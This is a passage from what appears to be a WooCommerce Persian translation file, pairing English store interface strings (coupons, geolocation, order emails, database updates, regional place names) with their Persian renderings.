term.'=>'تعداد اشیاء (هر نوع از نوشته) اختصاص داده شده به اصطلاح.','String based identifier for the term.'=>'شناسۀ مبتنی بر رشته برای اصطلاح.','Limit result set to products with a certain average rating.'=>'مجموعۀ نتایج را به محصولاتی با رتبۀ متوسط ​​معین محدود کنید.','The logical relationship between attributes when filtering across multiple at once.'=>'رابطۀ منطقی بین ویژگی‌ها در زمان محدودسازی چندگانه به طور هم‌زمان.','List of attribute slug(s). If a term ID is provided, this will be ignored.'=>'فهرست نامک(های) ویژگی. اگر شناسۀ اصطلاح ارائه شود، نادیده گرفته می‌شود.','Limit result set to products with selected global attributes.'=>'مجموعۀ نتایج را به محصولاتی با ویژگی‌های کلی انتخابی محدود کنید.','When limiting response using after/before, which date column to compare against.'=>'هنگام محدود کردن پاسخ با پس از/قبل از، که با کدام ستون تاریخ مقایسه شود.','If true, calculates rating counts for products in the collection.'=>'اگر فعال باشد، تعداد رتبه‌بندی محصولات موجود در مجموعه را محاسبه می‌کند.','If true, calculates the minimum and maximum product prices for the collection.'=>'اگر فعال باشد، حداقل و حداکثر قیمت محصول را برای مجموعه محاسبه می‌کند.','If requested, calculates attribute term counts for products in the collection.'=>'در صورت درخواست، تعداد مدت مشخصه را برای محصولات موجود در مجموعه محاسبه می‌کند.','Returns number of products with each average rating.'=>'تعداد محصولات را با هر میانگین امتیاز ​​برمی‌گرداند.','Variation attribute value.'=>'مقدار ویژگی متغیر.','Variation attribute name.'=>'نام ویژگی متغیر.','Chosen attributes (for variations).'=>'ویژگی‌های انتخاب شده (برای متغیرها).','The cart item product or variation ID.'=>'شناسه محصول یا شناسه متغیر کالا.','No matching variation found.'=>'هیچ متغیر مطابقی یافت نشد.','Missing variation data for variable product.'=>'داده‌ متغیر برای محصول متغیر وجود ندارد.','Button description.'=>'توضیح دکمه.','Button text.'=>'متن دکمه.','Sale product price, if applicable.'=>'قیمت فروش محصول، در صورت وجود.','Regular product price.'=>'قیمت عادی محصول.','Attribute type.'=>'نوع ویژگی.','Taxonomy name.'=>'نام طبقه بندی.','Number of products.'=>'تعداد محصولات.','Max price found in collection of products.'=>'بیشترین قیمت پیدا شده در مجموعه ای از محصولات.','Min price found in collection of products.'=>'کمترین قیمت پیدا شده در مجموعه ای از محصولات.','Total post count.'=>'تعداد کل نوشته‌ها.','Xiangkhouang'=>'Xiangkhouang','Sekong'=>'Sekong','Sainyabuli'=>'Sainyabuli','Vientiane'=>'Vientiane','Vientiane Province'=>'Vientiane Province','Savannakhet'=>'Savannakhet','Salavan'=>'Salavan','Phongsaly'=>'Phongsaly','Oudomxay'=>'Oudomxay','Luang Prabang'=>'Luang Prabang','Luang Namtha'=>'Luang Namtha','Khammouane'=>'Khammouane','Houaphanh'=>'Houaphanh','Champasak'=>'Champasak','Bolikhamsai'=>'Bolikhamsai','Bokeo'=>'Bokeo','Attapeu'=>'Attapeu','How terms in this attribute are sorted by default.'=>'چگونه عبارات در این ویژگی به طور پیشفرض مرتب می‌شوند.','Missing product ID'=>'شناسه محصول موجود نیست','Search results for "%s"'=>'نتایج جستجو برای "%s"','Database File Path'=>'مسیر پرونده پایگاه داده','MaxMind License Key'=>'کلید لایسنس MaxMind','Failed to download the MaxMind database.'=>'بارگیری پایگاه داده MaxMind انجام نشد.','An unexpected error happened while applying the Coupon %s.'=>'یک خطای غیر منتظره در حین اعمال کدتخفیف %s رخ داد.','Missing MaxMind Reader library!'=>'کتابخانه MaxMind Reader پیدا نشد!','The MaxMind license key is invalid. If you have recently created this key, you may need to wait for it to become active.'=>'کلید مجوز MaxMind معتبر نیست. اگر به تازگی این کلید را ایجاد کرده‌اید، باید منتظر بمانید تا کلید فعال شود.','Learn more about how usage tracking works, and how you\'ll be helping in our usage tracking documentation.'=>'در اسناد ردیابی مصرف درباره نحوه عملکرد ردیابی مصرف و نحوه کمک شما بیشتر بیاموزید.','The key that will be used when dealing with MaxMind Geolocation services. You can read how to generate one in MaxMind Geolocation Integration documentation.'=>'کلیدی که هنگام برخورد با خدمات MaxMind Geolocation استفاده می شود. می‌توانید نحوه ایجاد یکی را در مستندات ادغام مکان جغرافیایی MaxMind بخوانید.','Invalid product type: passed ID does not correspond to a product variation.'=>'نوع محصول نامعتبر است: شناسه ارسالی متعلق به یک متغیر نیست.','%1$s should not be called before the %2$s, %3$s and %4$s actions have finished.'=>'%1$s نباید قبل از پایان اقدامات %2$s، %3$s و %4$s فراخوانی شود.','An integration for utilizing MaxMind to do Geolocation lookups. Please note that this integration will only do country lookups.'=>'یکپارچه سازی برای استفاده از MaxMind برای انجام جستجوهای مکان جغرافیایی. لطفا توجه داشته باشید که این ادغام فقط جستجوی کشور را انجام می‌دهد.','You have used this coupon %s in another transaction during this checkout, and coupon usage limit is reached. Please remove the coupon and try again.'=>'شما از این کوپن %s در تراکنش دیگری در این تسویه‌حساب استفاده کرده‌اید و به حد مجاز استفاده از کوپن رسیده‌اید. لطفا کوپن را بردارید و دوباره امتحان کنید.','Coupon %s was used in another transaction during this checkout, and coupon usage limit is reached. Please remove the coupon and try again.'=>'کوپن %s در تراکنش دیگری در این تسویه‌حساب استفاده شد و به حد مجاز استفاده از کوپن رسیده است. لطفا کوپن را بردارید و دوباره امتحان کنید.','Please enter a value with one decimal point (%s) without thousand separators.'=>'لطفا مقداری با یک رقم اعشار (%s) بدون جدا کننده هزارگان وارد کنید.','The location that the MaxMind database should be stored. By default, the integration will automatically save the database here.'=>'مکانی که پایگاه دادۀ MaxMind باید ذخیره شود. به طور پیشفرض، ادغام به طور خودکار پایگاه داده را در اینجا ذخیره می‌کند.','You cannot add a new payment method so soon after the previous one. Please wait for %d second.'=>'نمی‌توانید روش پرداخت جدیدی را خیلی زود پس از روش قبلی اضافه کنید. لطفا %d ثانیه صبر کنید.','Yes please'=>'بله لطفا','Welcome to'=>'خوش آمدید به','The "WooCommerce Admin" plugin will be installed and activated'=>'افزونه \'WooCommerce Admin\' نصب و فعال می شود','Get your store up and running more quickly with our new and improved setup experience'=>'با تجربه راه اندازی جدید و بهبود یافته ما فروشگاه خود را سریعتر راه اندازی کنید','You must enter a valid license key on the MaxMind integration settings page in order to use the geolocation service. If you do not need geolocation for shipping or taxes, you should change the default customer location on the general settings page.'=>'برای استفاده از سرویس موقعیت جغرافیایی، باید یک کلید مجوز معتبر را در صفحه تنظیمات ادغام MaxMind وارد کنید. اگر برای حمل و نقل یا مالیات به موقعیت جغرافیایی نیاز ندارید، باید مکان پیشفرض مشتری را در صفحه تنظیمات عمومی تغییر دهید.','Every 15 Days'=>'هر 15 روز','Shipping costs are calculated during checkout.'=>'هزینه حمل‌ و نقل در هنگام پرداخت محاسبه می شود.','Geolocation has not been configured.'=>'موقعیت جغرافیایی پیکربندی نشده است.','%s is a variable product parent and cannot be added.'=>'%s یک محصول متغیر والد است و نمیتواند اضافه شود.','Search products…'=>'جستجوی محصولات…','Amount of reviews that the product has.'=>'مقدار بررسی هایی که محصول می کند.','The date the review was created, in the site\'s timezone in human-readable format.'=>'تاریخ ایجاد بررسی، در منطقه زمانی سایت با فرمت قابل خواندن توسط انسان.','Name of the product that the review belongs to.'=>'نام محصولی که بررسی به آن تعلق دارد.','Permalink of the product that the review belongs to.'=>'پیوند همیشگی محصولی که بررسی به آن تعلق دارد.','Image of the product that the review belongs to.'=>'تصویر محصولی که بررسی به آن تعلق دارد.','Jetpack logo'=>'آرم Jetpack','Customer matched zone "%s"'=>'منطقه منطبق با مشتری "%s"','Browse products'=>'مرور محصولات','Midway Atoll'=>'Midway Atoll','The coupon will expire at 00:00:00 of this date.'=>'کدتخفیف در 00:00:00 از این تاریخ منقضی می شود.','Enable usage tracking and help improve WooCommerce'=>'ردیابی استفاده را فعال کنید و به بهبود ووکامرس کمک کنید','Help improve WooCommerce with usage tracking'=>'با ردیابی استفاده، به بهبود ووکامرس کمک کنید','Muchinga'=>'Muchinga','Lusaka'=>'Lusaka','Copperbelt'=>'Copperbelt','Southern'=>'Southern','North-Western'=>'North-Western','Northern'=>'Northern','Luapula'=>'Luapula','Eastern'=>'Eastern','Western'=>'Western','Macao'=>'Macao','Columns:'=>'ستون‌ها:','+%d more'=>'+%d بیشتر','Shop now'=>'اکنون خرید کنید','Go to category'=>'برو به دسته‌بندی','Columns'=>'ستون‌ها','Show description'=>'نمایش توضیحات','1 variation'=>'۱ متغیر','Product title'=>'عنوان محصول','Your installation of WooCommerce is incomplete. If you installed WooCommerce from GitHub, %1$splease refer to this document%2$s to set up your development environment.'=>'نصب شما از WooCommerce ناقص است. اگر WooCommerce را از GitHub نصب کرده اید، %1$s لطفا برای تنظیم محیط توسعه خود به این سند %2$s مراجعه کنید.','Your installation of WooCommerce is incomplete. If you installed WooCommerce from GitHub, please refer to this document to set up your development environment: https://developer.woocommerce.com/docs/contribution/contributing/#setting-up-your-development-environment'=>'نصب ووکامرس شما ناقص است. اگر ووکامرس را از گیت‌هاب نصب کرده‌اید، لطفا برای تنظیم محیط توسعه خود به این سند مراجعه کنید: https://developer.woocommerce.com/docs/contribution/contributing/#setting-up-your-development-environment','woocommerce'=>'ووکامرس','Category URL.'=>'آدرس دسته.','Operator to compare product tags.'=>'عملگر برای مقایسه برچسب های محصول.','Rukungiri'=>'Rukungiri','Mpigi'=>'Mpigi','Lyantonde'=>'Lyantonde','Kikuube'=>'Kikuube','Buyende'=>'Buyende','Butebo'=>'Butebo','Bundibugyo'=>'Bundibugyo','Product variation attributes, if applicable.'=>'در صورت کاربرد ویژگی های محصول متغیر.','Missing the WooCommerce %s package'=>'فاقد بسته ووکامرس %s','Zombo'=>'Zombo','Yumbe'=>'Yumbe','Wakiso'=>'Wakiso','Tororo'=>'Tororo','Soroti'=>'Soroti','Sironko'=>'Sironko','Sheema'=>'Sheema','Serere'=>'Serere','Sembabule'=>'Sembabule','Rukiga'=>'Rukiga','Rubirizi'=>'Rubirizi','Rubanda'=>'Rubanda','Rakai'=>'Rakai','Pallisa'=>'Pallisa','Pakwach'=>'Pakwach','Pader'=>'Pader','Oyam'=>'Oyam','Otuke'=>'Otuke','Omoro'=>'Omoro','Nwoya'=>'Nwoya','Ntungamo'=>'Ntungamo','Ntoroko'=>'Ntoroko','Ngora'=>'Ngora','Nebbi'=>'Nebbi','Napak'=>'Napak','Namutumba'=>'Namutumba','Namisindwa'=>'Namisindwa','Namayingo'=>'Namayingo','Nakasongola'=>'Nakasongola','Nakaseke'=>'Nakaseke','Nakapiripirit'=>'Nakapiripirit','Nabilatuk'=>'Nabilatuk','Mukono'=>'Mukono','Mubende'=>'Mubende','Moyo'=>'Moyo','Moroto'=>'Moroto','Mityana'=>'Mityana','Mitooma'=>'Mitooma','Mbarara'=>'Mbarara','Mbale'=>'Mbale','Mayuge'=>'Mayuge','Masindi'=>'Masindi','Masaka'=>'Masaka','Maracha'=>'Maracha','Manafwa'=>'Manafwa','Lwengo'=>'Lwengo','Luwero'=>'Luwero','Luuka'=>'Luuka','Lira'=>'Lira','Lamwo'=>'Lamwo','Kyotera'=>'Kyotera','Kyenjojo'=>'Kyenjojo','Kyegegwa'=>'Kyegegwa','Kyankwanzi'=>'Kyankwanzi','Kween'=>'Kween','Kwania'=>'Kwania','Kumi'=>'Kumi','Kotido'=>'Kotido','Kole'=>'Kole','Koboko'=>'Koboko','Kitgum'=>'Kitgum','Kisoro'=>'Kisoro','Kiryandongo'=>'Kiryandongo','Kiruhura'=>'Kiruhura','Kibuku'=>'Kibuku','Kiboga'=>'Kiboga','Kibaale'=>'Kibaale','Kayunga'=>'Kayunga','Katakwi'=>'Katakwi','Kasese'=>'Kasese','Kasanda'=>'Kasanda','Kapelebyong'=>'Kapelebyong','Kapchorwa'=>'Kapchorwa','Kanungu'=>'Kanungu','Kamwenge'=>'Kamwenge','Kamuli'=>'Kamuli','Kampala'=>'Kampala','Kalungu'=>'Kalungu','Kaliro'=>'Kaliro','Kalangala'=>'Kalangala','Kakumiro'=>'Kakumiro','Kagadi'=>'Kagadi','Kaberamaido'=>'Kaberamaido','Kabarole'=>'Kabarole','Kabale'=>'Kabale','Kaabong'=>'Kaabong','Jinja'=>'Jinja','Isingiro'=>'Isingiro','Iganga'=>'Iganga','Ibanda'=>'Ibanda','Hoima'=>'Hoima','Gulu'=>'Gulu','Gomba'=>'Gomba','Dokolo'=>'Dokolo','Buvuma'=>'Buvuma','Butambala'=>'Butambala','Butaleja'=>'Butaleja','Busia'=>'Busia','Bushenyi'=>'Bushenyi','Bunyangabu'=>'Bunyangabu','Buliisa'=>'Buliisa','Bulambuli'=>'Bulambuli','Bukwa'=>'Bukwa','Bukomansimbi'=>'Bukomansimbi','Bukedea'=>'Bukedea','Buikwe'=>'Buikwe','Buhweju'=>'Buhweju','Bugweri'=>'Bugweri','Bugiri'=>'Bugiri','Bududa'=>'Bududa','Budaka'=>'Budaka','Arua'=>'Arua','Apac'=>'Apac','Amuru'=>'Amuru','Amuria'=>'Amuria','Amudat'=>'Amudat','Amolatar'=>'Amolatar','Alebtong'=>'Alebtong','Agago'=>'Agago','Adjumani'=>'Adjumani','Abim'=>'Abim','with first and last resultShowing %1$d–%2$d of %3$d result'=>'نمایش %1$d–%2$d از %3$d نتیجه','WooCommerce Admin icon'=>'آیکون مدیر ووکامرس','WooCommerce Admin'=>'مدیر ووکامرس','Use WooCommerce Shipping (powered by WooCommerce Services & Jetpack) to save time at the post office by printing your shipping labels at home.'=>'با چاپ برچسب های حمل و نقل در خانه، از حمل و نقل WooCommerce (طراحی شده توسط WooCommerce Services & Jetpack) برای صرفه جویی در وقت در اداره پست استفاده کنید.','Did you know you can print shipping labels at home?'=>'آیا می دانید که می توانید برچسب های حمل و نقل را در خانه چاپ کنید؟','Import as meta data'=>'به عنوان داده متا وارد کنید','Tags (space separated)'=>'برچسب ها (فضای جدا شده)','Tags (comma separated)'=>'برچسب ها (کاما از هم جدا)','Manage your store\'s reports and monitor key metrics with a new and improved interface and dashboard.'=>'گزارش‌های فروشگاه خود را مدیریت کرده و معیارهای کلیدی را با یک رابط و پیشخوان جدید و پیشرفته نظارت کنید.','Variations (and their attributes) that do not have prices will not be shown in your store.'=>'متغیر‌ها (و ویژگی های آنها) که قیمت ندارند، در فروشگاه شما نشان داده نمی شود.','List additional tax classes you need below (1 per line, e.g. Reduced Rates). These are in addition to "Standard rate" which exists by default.'=>'کلاسهای مالیاتی اضافی مورد نیاز خود را در زیر ذکر کنید (1 در هر خط، به عنوان مثال نرخ کاهش یافته). اینها علاوه بر "نرخ استاندارد" است که بصورت پیشفرض وجود دارد.','%d variation does not have a price.'=>'%d مورد از تغییرات قیمت ندارند.','Database information:'=>'اطلاعات پایگاه داده:','Reduced rate'=>'نرخ کاهش','Zero rate'=>'نرخ صفر','Unable to retrieve database information. Usually, this is not a problem, and it only means that your install is using a class that replaces the WordPress database class (e.g., HyperDB) and WooCommerce is unable to get database information.'=>'بازیابی اطلاعات پایگاه داده امکان پذیر نیست. معمولاً، این مشکلی نیست و فقط بدان معنی است که نصب شما از یک کلاس استفاده می کند که جایگزین کلاس پایگاه داده WordPress (به عنوان مثال HyperDB) می شود و WooCommerce قادر به دریافت اطلاعات بانک اطلاعاتی نیست.','Drag and drop to set admin attribute order'=>'کشیدن و رها کردن برای تنظیم ویژگی ویژگی مدیر','Thanks for using {site_url}!'=>'با تشکر از شما برای استفاده از {site_url}!','Generate coupon code'=>'کدتخفیف ایجاد کنید','Data: %1$.2fMB + Index: %2$.2fMB + Engine %3$s'=>'داده: %1$.2fمگابایت + ایندکس: %2$.2fمگابایت + انجین %3$s','Congratulations on the sale.'=>'تبریک برای فروش.','Town / Village'=>'شهر / روستا','Invalid field'=>'فیلد نامعتبر است','Text to appear below the main email content.'=>'متن برای نمایش در زیر محتوای اصلی ایمیل.','Tax class slug already exists'=>'از بین بردن کلاس مالیاتی قبلاً وجود دارد','Tax class requires a valid name'=>'کلاس مالیاتی به یک نام معتبر احتیاج دارد','Additional content'=>'محتوای اضافی','Or you can download a pre-built version of the plugin from the WordPress.org repository or by visiting the releases page in the GitHub repository.'=>'یا می‌توانید نسخه پیش ساخته افزونه را از مخزن WordPress.org یا با مراجعه به صفحات منتشر شده در مخزن گیت‌هاب دانلود کنید.','Postal code'=>'کد پستی','Order not editable'=>'سفارش قابل ویرایش نیست','You do not have permission to install plugins.'=>'شما اجازه نصب افزونه‌ها را ندارید.','Learn how to upgrade'=>'یادگیری چگونگی ارتقاء','The sale will start at 00:00:00 of "From" date and end at 23:59:59 of "To" date.'=>'فروش از ساعت 00:00:00 در تاریخ "از" شروع می شود و از ساعت 23:59:59 در تاریخ "به" پایان می یابد.','Order fully refunded.'=>'سفارش به طور کامل بازپرداخت شد.','Selecting no country / region to sell to prevents from completing the checkout. Continue anyway?'=>'عدم انتخاب کشور/منطقه برای فروش مانع از تکمیل فرایند پرداخت می شود. با اینحال تمایل به ادامه فرایند دارید؟','Please enter a valid Eircode.'=>'لطفا یک Eircode معتبر وارد کنید.','There was a failure fetching this action'=>'گیرندگی این عمل شکست خورد','You can manually run queued updates here.'=>'شما در اینجا می‌توانید بروزرسانی‌های زمان‌بندی شده را به صورت دستی اجرا کنید.','Product display, sorting, and reports may not be accurate until this finishes. It will take a few minutes and this notice will disappear when complete.'=>'نمایش محصول، مرتب سازی و گزارش ممکن است تا پایان فرایند دقیق نباشد. هنگامی که فرایند کامل شد این اطلاعیه ناپدید می شود.','Note: WP CRON has been disabled on your install which may prevent this update from completing.'=>'توجه: WP CRON غیر فعال شده است،در اینصورت ممکن است از تکمیل بروزرسانی جلوگیری کند.','← Back to "%s" attributes'=>'; بازگشت به ویژگی‌های "%s"','Learn more about updates'=>'آگاهی بیشتر از بروز رسانی ها','Oldest Scheduled Date'=>'تاریخ قدیمی‌ترین زمانبندی','Newest Scheduled Date'=>'تاریخ جدیدترین زمانبندی','Invalid items'=>'آیتم‌های نامعتبر','Invalid rate'=>'نرخ نامعتبر','Action Scheduler'=>'عمل زمانبندی','Action Status'=>'وضعیت عمل','Increase existing stock by:'=>'افزودن موجودی انبار توسط:','View progress →'=>'مشاهده پیشرفت →','Added line items: %s'=>'موارد اضافه شده: %s','Decrease existing stock by:'=>'کاهش موجودی انبار توسط:','The %s class can only be run within WP CLI.'=>'کلاس %s فقط با WP CLI قابل اجرا است.','WooCommerce is updating product data in the background'=>'WooCommerce داده های محصول را در پس زمینه به روز می کند','Your account was created successfully. Your login details have been sent to your email address.'=>'حساب شما با موفقیت ساخته شد. جزئیات ورود به سیستم به آدرس ایمیل شما ارسال شده است.','Your account was created successfully and a password has been sent to your email address.'=>'حساب شما با موفقیت ایجاد شد و رمز ورود به آدرس ایمیل شما ارسال شد.','WooCommerce has been updated! To keep things running smoothly, we have to update your database to the newest version.'=>'ووکامرس به روز شد! برای اینکه کارها به خوبی اجرا شوند، باید پایگاه‌داده شما را به جدیدترین نگارش بروزرسانی نماییم.','The database update process runs in the background and may take a little while, so please be patient. Advanced users can alternatively update via %1$sWP CLI%2$s.'=>'فرآیند بروزرسانی پایگاه‌داده در پس‌زمینه اجرا می‌شود و ممکن است کمی طول بکشد، پس لطفا صبور باشید. کاربران پیشرفته می‌توانند از طریق %1$sWP CLI%2$s بروزرسانی کنند.','Deleted %1$s and adjusted stock (%2$s)'=>'%1$s حذف شد و موجودی تنظیم شد (%2$s)','Completed processing action %1$s with hook: %2$s'=>'عمل پردازش %1$s با قلاب %2$s انجام شد','[{site_title}]: Order #{order_number} has been cancelled'=>'[{site_title}]: سفارش شماره {order_number} لغو شده است','Updating database'=>'بروز رسانی پایگاه داده','Found %1$d updates (%2$s)'=>'بروز رسانی‌ها %1$d یافت شد (%2$s)','No updates required. Database version is %s'=>'بروز رسانی ضروری لازم نیست. نسخه پایگاه داده %s است','Update WooCommerce Database'=>'بروز رسانی پایگاه داده ووکامرس','WooCommerce database update required'=>'پایگاه داده ووکامرس نیازمند بروز رسانی است','WooCommerce is updating the database in the background. The database update process may take a little while, so please be patient.'=>'ووکامرس در حال بروز رسانی بانک اطلاعاتی در پس زمینه است. روند بروز رسانی پایگاه داده ممکن است کمی طول بکشد، بنابراین لطفا صبور باشید.','Count'=>'شمارش','Stock: %s'=>'موجودی: %s','Display suggestions within WooCommerce'=>'نمایش پیشنهادات در ووکامرس','Show Suggestions'=>'نمایش پیشنهادات','Marketplace suggestions'=>'پیشنهادهای بازار','five star'=>'پنج ستاره','Must Use Plugins'=>'بیشترین افزونه‌های مورد استفاده','Inactive plugins'=>'افزونه‌های غیرفعال','Dropin Plugins'=>'افزونه‌های Dropin','Site address (URL)'=>'آدرس سایت','WordPress address (URL)'=>'آدرس وردپرس','Start Import'=>'شروع درون‌ریزی','Create Product'=>'ساخت محصول','Dismiss this suggestion'=>'این پیشنهاد را ردکن','Enable tracking'=>'رهگیری را فعال کنید','Personal data removal'=>'حذف اطلاعات شخصی','Adjusted stock: %s'=>'تنظیم موجودی: %s','We show contextual suggestions for official extensions that may be helpful to your store.'=>'ما پیشنهادات متنی را برای برنامه های افزودنی رسمی نشان می دهیم که ممکن است برای فروشگاه شما مفید باشد.','To opt out, leave this box unticked. Your store remains untracked, and no data will be collected. Read about what usage data is tracked at: %s.'=>'برای امتناع، این جعبه را بدون استفاده رها کنید. فروشگاه شما بدون کنترل باقی می ماند و هیچ داده ای جمع آوری نمی شود. در مورد آنچه داده استفاده در ردیابی می شود بخوانید: %s.','Allow personal data to be removed in bulk from orders'=>'اجازه دهید داده های شخصی به صورت عمده از سفارشات حذف شوند','Remove access to downloads on request'=>'در صورت درخواست دسترسی به بارگیری ها را حذف کنید','Remove personal data from orders on request'=>'داده های شخصی را از سفارشات در صورت درخواست حذف کنید','Is your site connected to WooCommerce.com?'=>'سایت شما به WooCommerce.com متصل است؟','Enter a coupon code to apply. Discounts are applied to line totals, before taxes.'=>'کدتخفیفی برای اعمال را وارد کنید. قبل از مالیات، تخفیف برای کل ردیف‌ها اعمال می شود.','Adds an option to the orders screen for removing personal data in bulk. Note that removing personal data cannot be undone.'=>'گزینه‌ای را برای حذف بخش عمده داده شخصی از صفحه نمایش سفارشات اضافه می کند. توجه داشته باشید که حذف داده‌های شخصی قابل بازگشت نیست.','Allow usage of WooCommerce to be tracked'=>'اجازه استفاده از WooCommerce برای ردیابی','Manage suggestions'=>'مدیریت پیشنهادها','WooCommerce.com'=>'WooCommerce.com','Facebook'=>'فیسبوک','Facebook icon'=>'آیکون فیسبوک','Enhance your products'=>'بهبود محصولات شما','Facebook for WooCommerce'=>'فیسبوک برای ووکامرس','%s discount'=>'%s تخفیف','WooCommerce Status'=>'وضعیت ووکامرس','Before discount'=>'قبل از تخفیف','Marketplace suggestionsGet more options'=>'گزینه های بیشتری دریافت کنید','Usage Tracking'=>'رهگیری استفاده','Order status set to refunded. To return funds to the customer you will need to issue a refund through your payment gateway.'=>'وضعیت سفارش برای بازپرداخت تعیین شده است. برای بازگرداندن وجوه به مشتری، باید یک شماره حساب معتبر بانکی برای ما ارسال نمایید.','Lookup tables are regenerating'=>'جداول جستجو در حال بازسازی','Browse the Marketplace'=>'Marketplace را مرور کنید','Extensions can add new functionality to your product pages that make your store stand out'=>'برنامه های افزودنی می توانند قابلیت های جدیدی را به صفحات محصول شما بیابند که باعث می شود فروشگاه شما از ویژگیهای خاصی برخوردار باشد','Enjoy all Facebook products combined in one extension: pixel tracking, catalog sync, messenger chat, shop functionality and Instagram shopping (coming soon)!'=>'لذت بردن از تمام محصولات فیس بوک همراه در یک پسوند: ردیابی پیکسل، همگام سازی کاتالوگ، چت مسنجر، عملکرد فروشگاه و خرید اینستاگرام (به زودی)!','Refund the line items above. This will show the total amount to be refunded'=>'موارد خط را در بالا بازپرداخت کنید. این نشان می دهد کل مبلغ قابل استرداد است','Sol'=>'سول','Determines if hidden or visible catalog products are shown.'=>'تعیین می کند که محصولات فهرست پنهان یا قابل مشاهده نشان داده شده اند یا خیر.','Operator to compare product attribute terms.'=>'اپراتور برای مقایسه شرایط ویژگی محصول.','Operator to compare product category terms.'=>'اپراتور برای مقایسه شرایط دسته بندی محصولات.','Number of terms in the attribute taxonomy.'=>'تعداد اصطلاحات در طبقه بندی ویژگی.','This tool will regenerate product lookup table data. This process may take a while.'=>'این ابزار داده های جدول جستجوی محصول را بازسازی می کند. این روند ممکن است مدتی طول بکشد.','Product lookup tables'=>'جداول جستجوی محصول','cURL installed but unable to retrieve version.'=>'cURL نصب شده اما قادر به بازیابی نسخه نیست.','Dropins & MU plugins.'=>'افزونه های Dropins & MU.','Limit result set to orders which have specific statuses.'=>'نتیجه را محدود به سفارشاتی کنید که وضعیت خاصی دارند.','action_args should not be overwritten when calling wc_get_template.'=>'تابع action_args نباید هنگام فراخوانی تابع wc_get_template بازنویسی شود.','Inactive plugins.'=>'افزونه‌های غیرفعال.','Attribute slug.'=>'نامک ویژگی.','WooCommerce.com Usage Tracking Documentation'=>'مستندات ردیابی استفاده WooCommerce.com','You must be %1$slogged in%2$s to post a review.'=>'برای فرستادن دیدگاه، باید %1$sوارد شده%2$s باشید.','Virgin Islands (US)'=>'Virgin Islands (US)','Virgin Islands (British)'=>'Virgin Islands (British)','North Macedonia'=>'North Macedonia','Wake Island'=>'Wake Island','Palmyra Atoll'=>'Palmyra Atoll','Navassa Island'=>'Navassa Island','Kingman Reef'=>'Kingman Reef','Johnston Atoll'=>'Johnston Atoll','Jarvis Island'=>'Jarvis Island','Howland Island'=>'Howland Island','Baker Island'=>'Baker Island','Shop order'=>'سفارش خرید','Shipping options will be updated during checkout.'=>'گزینه های حمل و نقل در هنگام پرداخت به روز می شوند.','Shipping to %s.'=>'حمل و نقل به %s.','Notification to let you know — order #%1$s belonging to %2$s has been cancelled:'=>'اعلان برای اطلاع شما — سفارش #%1$s متعلق به %2$s لغو شده است:','We have finished processing your order.'=>'ما کار پردازش سفارش شما را به پایان رساندیم.','Invalid image: %s'=>'تصویر نامعتبر: %s','Just to let you know — we\'ve received your order #%s, and it is now being processed:'=>'جهت اطلاع شما — سفارش شما را دریافت کردیم #%s، و در حال پردازش است:','Webhook status must be valid.'=>'وضعیت وب‌هوک باید معتبر باشد.','account erasure request'=>'درخواست پاک کردن حساب','Update database'=>'به‌روز‌رسانی پایگاه داده','Database upgrade routine has been scheduled to run in the background.'=>'بروز رسانی پایگاه داده برنامه ریزی شده است که در پس زمینه اجرا شود.','This tool will update your WooCommerce database to the latest version. Please ensure you make sufficient backups before proceeding.'=>'این ابزار پایگاه داده WooCommerce شما را به آخرین نسخه به روز رسانی خواهد کرد. لطفا اطمینان حاصل کنید که قبل از انجام پشتیبان گیری کافی داشته باشید.','Variation cannot be imported: Parent product cannot be a product variation'=>'متغیر نمی تواند وارد شود: محصول والد نمی تواند محصول متغیر باشد','Default product category cannot be deleted.'=>'دسته پیشفرض محصول را نمی توان حذف کرد.','Details for order #{order_number}'=>'جزئیات سفارش #{order_number}','discounted shipping labels'=>'برچسب‌های حمل ونقل با تخفیف','Sorry to see you go.'=>'از رفتن شما ناراحتیم.','automated taxes and discounted shipping labels'=>'برچسب تخفیف حمل و نقل و مالیات خودکار','payment setup and discounted shipping labels'=>'راه اندازی پرداخت و برچسب تخفیف حمل و نقل','Feel free to reconnect again using the button below.'=>'مجددا با استفاده از دکمه زیر ارتباط برقرار کنید.','You do not have permission to revoke API Keys'=>'شما مجوز لغو کلیدهای API را ندارید','You do not have permission to assign API Keys to the selected user.'=>'شما اجازه ندارید کلید‌های API را به کاربر انتخاب شده اختصاص دهید.','You do not have permission to revoke this API Key'=>'شما مجوز لغو این کلید API را ندارید','You do not have permission to edit this API Key'=>'شما مجوز ویرایش این کلید API ندارید','WooCommerce Endpoints'=>'ارجاع ووکامرس','Thanks!'=>'متشکریم!','We hope to see you again soon.'=>'امیدواریم به زودی دوباره شما را ببینیم.','Someone has requested a new password for the following account on %s:'=>'شخصی درخواست رمز جدیدی برای حساب کاربری زیر را در %s داده است:','[Order #%1$s] (%2$s)'=>'[سفارش #%1$s] (%2$s)','If you didn\'t make this request, just ignore this email. If you\'d like to proceed:'=>'اگر این درخواست از طرف شما نبوده است، این ایمیل را نادیده بگیرید. اگر مایل به ادامه‌دادن هستید:','Your order on %s has been partially refunded. There are more details below for your reference:'=>'سفارش شما در %s تا حدودی مسترد شده است. جزئیات بیشتر در زیر برای مرجع شما وجود دارد:','Your order on %s has been refunded. There are more details below for your reference:'=>'سفارش شما در %s مسترد شده است. جزئیات بیشتر در زیر برای مرجع شما وجود دارد:','We look forward to fulfilling your order soon.'=>'ما مشتاقانه منتظر سفارش شما هستیم.','The following note has been added to your order:'=>'یادداشت زیر به سفارش شما اضافه شده است:','Here are the details of your order placed on %s:'=>'جزییات سفارش شما بدین صورت است %s:','As a reminder, here are your order details:'=>'به عنوان یادآوری، جزییات سفارش شما به شرح زیر است:','An order has been created for you on %1$s. Your order details are below, with a link to make payment when you’re ready: %2$s'=>'سفارشی برای شما در تاریخ %1$s ایجاد شد. جزئیات سفارش شما در زیر آمده است، به همراه لینکی برای پرداخت پس از آماده شدن: %2$s','We look forward to seeing you soon.'=>'منتظر دیدار مجدد شما هستیم.','Thanks for creating an account on %1$s. Your username is %2$s. You can access your account area to view orders, change your password, and more at: %3$s'=>'با تشکر برای ایجاد یک حساب در %1$s، نام کاربری شما %2$s، برای مشاهده سفارشات، تغییر رمز عبور و موارد دیگر در %3$s به حساب خود دسترسی دارید','Thanks for shopping with us.'=>'از خرید شما متشکریم.','You’ve received the following order from %s:'=>'سفارشی بدین شرح از %s دریافت شده است:','Hi %s,'=>'سلام %s،','Hopefully they’ll be back. Read more about troubleshooting failed payments.'=>'امیدواریم دوباره برگردند. درباره عیب‌یابی پرداخت‌های ناموفق بیشتر بخوانید.','Thanks for reading.'=>'از توجه شما سپاسگزاریم.','action 